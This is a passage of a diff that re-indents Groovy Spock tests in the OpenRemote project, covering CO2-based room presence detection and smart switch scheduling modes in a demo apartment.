+      assert roomAsset.getAttribute("presenceDetected").flatMap{it.value}.orElse(false)
+      assert roomAsset.getAttribute("lastPresenceDetected").flatMap{
+        it.value
+      }.orElse(0d) == expectedLastPresenceDetected
+    }
 
-        then: "presence should be gone but the last timestamp still available"
-        conditions.eventually {
-            def roomAsset = assetStorageService.find(managerTestSetup.apartment1LivingroomId, true)
-            assert !roomAsset.getAttribute("presenceDetected").flatMap{it.value}.orElse(false)
-            assert roomAsset.getAttribute("lastPresenceDetected").flatMap{it.value}.orElse(0d) == expectedLastPresenceDetected
-        }
+    when: "there is no CO2 level increase for a while (nobody resting in the room)"
+    advancePseudoClock(20, MINUTES, container)
 
-            }
+    then: "presence should be gone but the last timestamp still available"
+    conditions.eventually {
+      def roomAsset = assetStorageService.find(managerTestSetup.apartment1LivingroomId, true)
+      assert !roomAsset.getAttribute("presenceDetected").flatMap{it.value}.orElse(false)
+      assert roomAsset.getAttribute("lastPresenceDetected").flatMap{
+        it.value
+      }.orElse(0d) == expectedLastPresenceDetected
+    }
+  }
 
-        /* TODO Migrate to JS, didn't compile even with Drools
-        def "Presence prediction rules compilation"() {
-
-            given: "the container environment is started"
-            def conditions = new PollingConditions(timeout: 100, delay: 0.2)
-            def container = startContainer(defaultConfig(), defaultServices())
-            def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-            def rulesService = container.getService(RulesService.class)
-            def assetStorageService = container.getService(AssetStorageService.class)
-            def rulesetStorageService = container.getService(RulesetStorageService.class)
-            def simulatorProtocol = container.getService(SimulatorProtocol.class)
-            RulesEngine apartment1Engine = null
-
-            and: "some rules"
-            Ruleset ruleset = new AssetRuleset(
-                    "Demo Apartment - Presence Detection with motion sensor",
-                    managerTestSetup.apartment1Id,
-                    getClass().getResource("/demo/rules/LegacyDemoApartmentPresencePrediction.drl").text
-            )
-            rulesetStorageService.merge(ruleset)
-
-            expect: "the rule engines to become available and be running"
-            conditions.eventually {
-                apartment1Engine = rulesService.assetEngines.get(managerTestSetup.apartment1Id)
-                assert apartment1Engine != null
-                assert apartment1Engine.isRunning()
-    //            assert apartment1Engine.knowledgeSession.factCount == DEMO_RULE_STATES_APARTMENT_1
-            }
-        }
-        */
-
+  /* TODO Migrate to JS, didn't compile even with Drools
+   def "Presence prediction rules compilation"() {
+   given: "the container environment is started"
+   def conditions = new PollingConditions(timeout: 100, delay: 0.2)
+   def container = startContainer(defaultConfig(), defaultServices())
+   def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+   def rulesService = container.getService(RulesService.class)
+   def assetStorageService = container.getService(AssetStorageService.class)
+   def rulesetStorageService = container.getService(RulesetStorageService.class)
+   def simulatorProtocol = container.getService(SimulatorProtocol.class)
+   RulesEngine apartment1Engine = null
+   and: "some rules"
+   Ruleset ruleset = new AssetRuleset(
+   "Demo Apartment - Presence Detection with motion sensor",
+   managerTestSetup.apartment1Id,
+   getClass().getResource("/demo/rules/LegacyDemoApartmentPresencePrediction.drl").text
+   )
+   rulesetStorageService.merge(ruleset)
+   expect: "the rule engines to become available and be running"
+   conditions.eventually {
+   apartment1Engine = rulesService.assetEngines.get(managerTestSetup.apartment1Id)
+   assert apartment1Engine != null
+   assert apartment1Engine.isRunning()
+   //            assert apartment1Engine.knowledgeSession.factCount == DEMO_RULE_STATES_APARTMENT_1
+   }
+   }
+   */
 }

--- a/test/src/test/groovy/org/openremote/test/rules/residence/ResidenceSmartSwitchTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/rules/residence/ResidenceSmartSwitchTest.groovy
@@ -39,534 +39,544 @@ import static org.openremote.setup.integration.ManagerTestSetup.DEMO_RULE_STATES
 @Ignore
 class ResidenceSmartSwitchTest extends Specification implements ManagerContainerTrait {
 
-    static final double CYCLE_TIME_MILLISECONDS = 2.5 * 60 * 60 * 1000
+  static final double CYCLE_TIME_MILLISECONDS = 2.5 * 60 * 60 * 1000
 
-    def "Set mode ON_AT and begin/end cycle time in future"() {
+  def "Set mode ON_AT and begin/end cycle time in future"() {
 
-        given: "the container environment is started"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def rulesService = container.getService(RulesService.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
-        RulesEngine apartment1Engine = null
+    given: "the container environment is started"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def rulesService = container.getService(RulesService.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
+    RulesEngine apartment1Engine = null
 
-        and: "some rules"
-        Ruleset ruleset = new AssetRuleset(
+    and: "some rules"
+    Ruleset ruleset = new AssetRuleset(
             managerTestSetup.apartment1Id,
             "Demo Apartment - Smart Start",
             Ruleset.Lang.GROOVY,
             getClass().getResource("/org/openremote/test/rules/ResidenceSmartSwitch.groovy").text)
-        rulesetStorageService.merge(ruleset)
+    rulesetStorageService.merge(ruleset)
 
-        expect: "the rule engines to become available and be running"
-        conditions.eventually {
-            apartment1Engine = rulesService.assetEngines.get(managerTestSetup.apartment1Id)
-            assert apartment1Engine != null
-            assert apartment1Engine.isRunning()
-            assert apartment1Engine.facts.assetStates.size() == DEMO_RULE_STATES_APARTMENT_1
-        }
+    expect: "the rule engines to become available and be running"
+    conditions.eventually {
+      apartment1Engine = rulesService.assetEngines.get(managerTestSetup.apartment1Id)
+      assert apartment1Engine != null
+      assert apartment1Engine.isRunning()
+      assert apartment1Engine.facts.assetStates.size() == DEMO_RULE_STATES_APARTMENT_1
+    }
 
-        and: "smart switches should be off"
-        conditions.eventually {
-            def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
-            assert !kitchen.getAttribute("smartSwitchModeA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchBeginEndA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStartTimeA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchModeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchBeginEndB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStartTimeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchModeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchBeginEndC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStartTimeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledC").get().getValue().isPresent()
-        }
+    and: "smart switches should be off"
+    conditions.eventually {
+      def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
+      assert !kitchen.getAttribute("smartSwitchModeA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchBeginEndA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStartTimeA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchModeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchBeginEndB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStartTimeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchModeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchBeginEndC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStartTimeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledC").get().getValue().isPresent()
+    }
 
-        when: "mode is set to ON_AT"
-        assetProcessingService.sendAttributeEvent(
-                new AttributeEvent(managerTestSetup.apartment1KitchenId, "smartSwitchModeA", "ON_AT")
-        )
-        noEventProcessedIn(assetProcessingService, 500)
+    when: "mode is set to ON_AT"
+    assetProcessingService.sendAttributeEvent(
+            new AttributeEvent(managerTestSetup.apartment1KitchenId, "smartSwitchModeA", "ON_AT")
+            )
+    noEventProcessedIn(assetProcessingService, 500)
 
-        then: "mode should be ON_AT but actuator not enabled"
-        conditions.eventually {
-            def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
-            assert kitchen.getAttribute("smartSwitchModeA").get().getValue().get() == "ON_AT"
-            assert !kitchen.getAttribute("smartSwitchBeginEndA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStartTimeA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchModeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchBeginEndB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStartTimeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchModeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchBeginEndC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStartTimeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledC").get().getValue().isPresent()
-        }
+    then: "mode should be ON_AT but actuator not enabled"
+    conditions.eventually {
+      def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
+      assert kitchen.getAttribute("smartSwitchModeA").get().getValue().get() == "ON_AT"
+      assert !kitchen.getAttribute("smartSwitchBeginEndA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStartTimeA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchModeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchBeginEndB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStartTimeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchModeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchBeginEndC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStartTimeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledC").get().getValue().isPresent()
+    }
 
-        when: "begin/end cycle time is set to future"
-        long oneMinuteInFutureMillis = getClockTimeOf(container) + 60000
-        assetProcessingService.sendAttributeEvent(
-                new AttributeEvent(managerTestSetup.apartment1KitchenId, "smartSwitchBeginEndA", oneMinuteInFutureMillis)
-        )
-        noEventProcessedIn(assetProcessingService, 500)
+    when: "begin/end cycle time is set to future"
+    long oneMinuteInFutureMillis = getClockTimeOf(container) + 60000
+    assetProcessingService.sendAttributeEvent(
+            new AttributeEvent(managerTestSetup.apartment1KitchenId, "smartSwitchBeginEndA", oneMinuteInFutureMillis)
+            )
+    noEventProcessedIn(assetProcessingService, 500)
 
-        then: "mode should be ON_AT and actuator enabled with correct start/stop time"
-        conditions.eventually {
-            def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
-            assert kitchen.getAttribute("smartSwitchModeA").get().getValue().get() == "ON_AT"
-            assert kitchen.getAttribute("smartSwitchBeginEndA").flatMap{it.value}.orElse(0l) == oneMinuteInFutureMillis
-            assert kitchen.getAttribute("smartSwitchStartTimeA").flatMap{it.value}.orElse(0l) == oneMinuteInFutureMillis
-            assert kitchen.getAttribute("smartSwitchStopTimeA").flatMap{it.value}.orElse(0l) == oneMinuteInFutureMillis + CYCLE_TIME_MILLISECONDS
-            assert kitchen.getAttribute("smartSwitchEnabledA").flatMap{it.value}.orElse(0l) == 1
-            assert !kitchen.getAttribute("smartSwitchModeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchBeginEndB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStartTimeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchModeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchBeginEndC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStartTimeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledC").get().getValue().isPresent()
-        }
+    then: "mode should be ON_AT and actuator enabled with correct start/stop time"
+    conditions.eventually {
+      def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
+      assert kitchen.getAttribute("smartSwitchModeA").get().getValue().get() == "ON_AT"
+      assert kitchen.getAttribute("smartSwitchBeginEndA").flatMap{
+        it.value
+      }.orElse(0l) == oneMinuteInFutureMillis
+      assert kitchen.getAttribute("smartSwitchStartTimeA").flatMap{
+        it.value
+      }.orElse(0l) == oneMinuteInFutureMillis
+      assert kitchen.getAttribute("smartSwitchStopTimeA").flatMap{
+        it.value
+      }.orElse(0l) == oneMinuteInFutureMillis + CYCLE_TIME_MILLISECONDS
+      assert kitchen.getAttribute("smartSwitchEnabledA").flatMap{it.value}.orElse(0l) == 1
+      assert !kitchen.getAttribute("smartSwitchModeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchBeginEndB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStartTimeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchModeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchBeginEndC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStartTimeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledC").get().getValue().isPresent()
+    }
 
-        when: "time advances beyond end of cycle"
-        advancePseudoClock(5, HOURS, container)
+    when: "time advances beyond end of cycle"
+    advancePseudoClock(5, HOURS, container)
 
-        then: "mode should be NOW_ON and actuator not enabled"
-        conditions.eventually {
-            def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
-            assert kitchen.getAttribute("smartSwitchModeA").get().getValue().get() == "NOW_ON"
-            assert !kitchen.getAttribute("smartSwitchBeginEndA").get().getValue().isPresent()
-            assert kitchen.getAttribute("smartSwitchStartTimeA").flatMap{it.value}.orElse(0l) == 0
-            assert kitchen.getAttribute("smartSwitchStopTimeA").flatMap{it.value}.orElse(0l) == 0
-            assert kitchen.getAttribute("smartSwitchEnabledA").flatMap{it.value}.orElse(0l) == 0
-            assert !kitchen.getAttribute("smartSwitchModeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchBeginEndB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStartTimeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchModeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchBeginEndC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStartTimeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledC").get().getValue().isPresent()
-        }
+    then: "mode should be NOW_ON and actuator not enabled"
+    conditions.eventually {
+      def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
+      assert kitchen.getAttribute("smartSwitchModeA").get().getValue().get() == "NOW_ON"
+      assert !kitchen.getAttribute("smartSwitchBeginEndA").get().getValue().isPresent()
+      assert kitchen.getAttribute("smartSwitchStartTimeA").flatMap{it.value}.orElse(0l) == 0
+      assert kitchen.getAttribute("smartSwitchStopTimeA").flatMap{it.value}.orElse(0l) == 0
+      assert kitchen.getAttribute("smartSwitchEnabledA").flatMap{it.value}.orElse(0l) == 0
+      assert !kitchen.getAttribute("smartSwitchModeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchBeginEndB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStartTimeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchModeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchBeginEndC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStartTimeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledC").get().getValue().isPresent()
+    }
+  }
 
-            }
+  def "Set mode ON_AT and begin/end cycle time in past"() {
 
-    def "Set mode ON_AT and begin/end cycle time in past"() {
+    given: "the container environment is started"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def rulesService = container.getService(RulesService.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
+    RulesEngine apartment1Engine = null
 
-        given: "the container environment is started"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def rulesService = container.getService(RulesService.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
-        RulesEngine apartment1Engine = null
-
-        and: "some rules"
-        Ruleset ruleset = new AssetRuleset(
+    and: "some rules"
+    Ruleset ruleset = new AssetRuleset(
             managerTestSetup.apartment1Id,
             "Demo Apartment - Smart Start",
             Ruleset.Lang.GROOVY,
             getClass().getResource("/org/openremote/test/rules/ResidenceSmartSwitch.groovy").text)
-        rulesetStorageService.merge(ruleset)
+    rulesetStorageService.merge(ruleset)
 
-        expect: "the rule engines to become available and be running"
-        conditions.eventually {
-            apartment1Engine = rulesService.assetEngines.get(managerTestSetup.apartment1Id)
-            assert apartment1Engine != null
-            assert apartment1Engine.isRunning()
-            assert apartment1Engine.facts.assetStates.size() == DEMO_RULE_STATES_APARTMENT_1
-        }
+    expect: "the rule engines to become available and be running"
+    conditions.eventually {
+      apartment1Engine = rulesService.assetEngines.get(managerTestSetup.apartment1Id)
+      assert apartment1Engine != null
+      assert apartment1Engine.isRunning()
+      assert apartment1Engine.facts.assetStates.size() == DEMO_RULE_STATES_APARTMENT_1
+    }
 
-        and: "smart switches should be off"
-        conditions.eventually {
-            def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
-            assert !kitchen.getAttribute("smartSwitchModeA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStartTimeA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchModeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStartTimeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchModeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStartTimeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledC").get().getValue().isPresent()
-        }
+    and: "smart switches should be off"
+    conditions.eventually {
+      def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
+      assert !kitchen.getAttribute("smartSwitchModeA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStartTimeA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchModeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStartTimeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchModeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStartTimeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledC").get().getValue().isPresent()
+    }
 
-        when: "mode is set to ON_AT"
-        assetProcessingService.sendAttributeEvent(
-                new AttributeEvent(managerTestSetup.apartment1KitchenId, "smartSwitchModeA", "ON_AT")
-        )
-        noEventProcessedIn(assetProcessingService, 500)
+    when: "mode is set to ON_AT"
+    assetProcessingService.sendAttributeEvent(
+            new AttributeEvent(managerTestSetup.apartment1KitchenId, "smartSwitchModeA", "ON_AT")
+            )
+    noEventProcessedIn(assetProcessingService, 500)
 
-        then: "mode should be ON_AT but actuator not enabled"
-        conditions.eventually {
-            def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
-            assert kitchen.getAttribute("smartSwitchModeA").get().getValue().get() == "ON_AT"
-            assert !kitchen.getAttribute("smartSwitchStartTimeA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchModeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStartTimeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchModeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStartTimeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledC").get().getValue().isPresent()
-        }
+    then: "mode should be ON_AT but actuator not enabled"
+    conditions.eventually {
+      def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
+      assert kitchen.getAttribute("smartSwitchModeA").get().getValue().get() == "ON_AT"
+      assert !kitchen.getAttribute("smartSwitchStartTimeA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchModeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStartTimeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchModeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStartTimeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledC").get().getValue().isPresent()
+    }
 
-        when: "begin/end cycle time is set to past"
-        long fiveMinutesInPastMillis = getClockTimeOf(container) - (5 * 60 * 1000)
-        assetProcessingService.sendAttributeEvent(
-                new AttributeEvent(managerTestSetup.apartment1KitchenId, "smartSwitchBeginEndA", fiveMinutesInPastMillis)
-        )
-        noEventProcessedIn(assetProcessingService, 500)
+    when: "begin/end cycle time is set to past"
+    long fiveMinutesInPastMillis = getClockTimeOf(container) - (5 * 60 * 1000)
+    assetProcessingService.sendAttributeEvent(
+            new AttributeEvent(managerTestSetup.apartment1KitchenId, "smartSwitchBeginEndA", fiveMinutesInPastMillis)
+            )
+    noEventProcessedIn(assetProcessingService, 500)
 
-        then: "mode should be ON_AT and actuator not enabled"
-        conditions.eventually {
-            def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
-            assert kitchen.getAttribute("smartSwitchModeA").get().getValue().get() == "ON_AT"
-            assert !kitchen.getAttribute("smartSwitchStartTimeA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchModeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStartTimeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchModeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStartTimeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledC").get().getValue().isPresent()
-        }
+    then: "mode should be ON_AT and actuator not enabled"
+    conditions.eventually {
+      def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
+      assert kitchen.getAttribute("smartSwitchModeA").get().getValue().get() == "ON_AT"
+      assert !kitchen.getAttribute("smartSwitchStartTimeA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchModeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStartTimeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchModeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStartTimeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledC").get().getValue().isPresent()
+    }
+  }
 
-            }
+  def "Set mode READY_AT and begin/end cycle time in future"() {
 
-    def "Set mode READY_AT and begin/end cycle time in future"() {
+    given: "the container environment is started"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def rulesService = container.getService(RulesService.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
+    RulesEngine apartment1Engine = null
 
-        given: "the container environment is started"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def rulesService = container.getService(RulesService.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
-        RulesEngine apartment1Engine = null
-
-        and: "some rules"
-        Ruleset ruleset = new AssetRuleset(
+    and: "some rules"
+    Ruleset ruleset = new AssetRuleset(
             managerTestSetup.apartment1Id,
             "Demo Apartment - Smart Start",
             Ruleset.Lang.GROOVY,
